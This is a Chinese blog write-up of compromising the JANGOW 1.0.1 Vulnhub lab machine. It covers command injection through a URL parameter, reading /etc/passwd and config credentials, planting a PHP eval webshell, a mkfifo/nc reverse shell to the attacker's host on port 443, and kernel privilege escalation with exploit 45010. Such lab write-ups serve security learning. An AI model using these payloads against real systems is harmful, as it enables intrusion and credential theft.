【Vulnhub靶机】JANGOW 1.0.1

文章描述了一次针对JANGOW1.0.1靶机的攻击过程,包括网卡配置信息收集、主机发现、端口扫描,发现漏洞并利用echo命令执行木马,通过反弹Shell获取webshell权限,以及后续的提权尝试。作者展示了如何绕过防火墙限制和使用exploits进行提权操作。
摘要由CSDN通过智能技术生成

靶机文档:JANGOW 1.0.1

下载地址:Download (Mirror)

难易程度:.

image-20230920144550613

网卡配置

水果味儿

信息收集

主机发现

image-20230920152630055

端口扫描

image-20230920201852054

访问80端口

image-20230920202810203

点击site目录

image-20230920203029833

点击页面上方的一个选项,发现Buscar的页面空白,而且地址栏的url看着可以输入一些东西

http://192.168.8.16/site/busque.php?buscar=

image-20230920204302463

?buscar=后面加上pwd,显示了当前路径

/site/busque.php?buscar=pwd

image-20230920204401670

/site/busque.php?buscar=cat%20/etc/passwd

image-20230920204425345

/site/busque.php?buscar=ls%20-a 发现了wordpress

image-20230920204650712

查看wordpress里都有什么文件 ls wordpress
image-20230920204754415

查看cat%20wordpress/config.php,页面空白,需要查看页面源代码

image-20230920204902308

发现了数据库配置

$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";

漏洞利用

使用命令执行,写入一句话木马

echo '<?php @eval($_POST[6868]);' >6868.php

image-20230920205153573

使用蚁剑连接一句话,拿到webshell

image-20230920205655894

site目录同级下,有一个隐藏的.backup文件

image-20230920205923383

$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";

image-20230920205820248

拿到webshell权限极低,啥也干不了

反弹Shell

查看攻略,该网站限制了一些端口,只能通过443端口进行访问

/etc/ufw/applications.d/

image-20230920213735426

查看apache2-utils.ufw.profile文件

image-20230920213857882

上传木马

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.8 443 >/tmp/f');?>

image-20230920214035452

kali监听443端口

访问该木马文件

image-20230920215215714

成功反弹到

image-20230920215227513

提权

交换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看内核版本

在这里插入图片描述

搜索相关漏洞

searchsploit ubuntu 4.4.0-31

image-20230920215601443

searchsploit  -p linux/local/45010.c

image-20230920215621804

45010.c上传的靶机

我先发送到我本机,然后本机上传到蚁剑上

image-20230920215827476

image-20230920215934955

赋予可执行权限,然后进行编译

image-20230920220121864

上传一个a.out文件,执行它

image-20230920220221251

切到/root目录下

image-20230920220243197

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值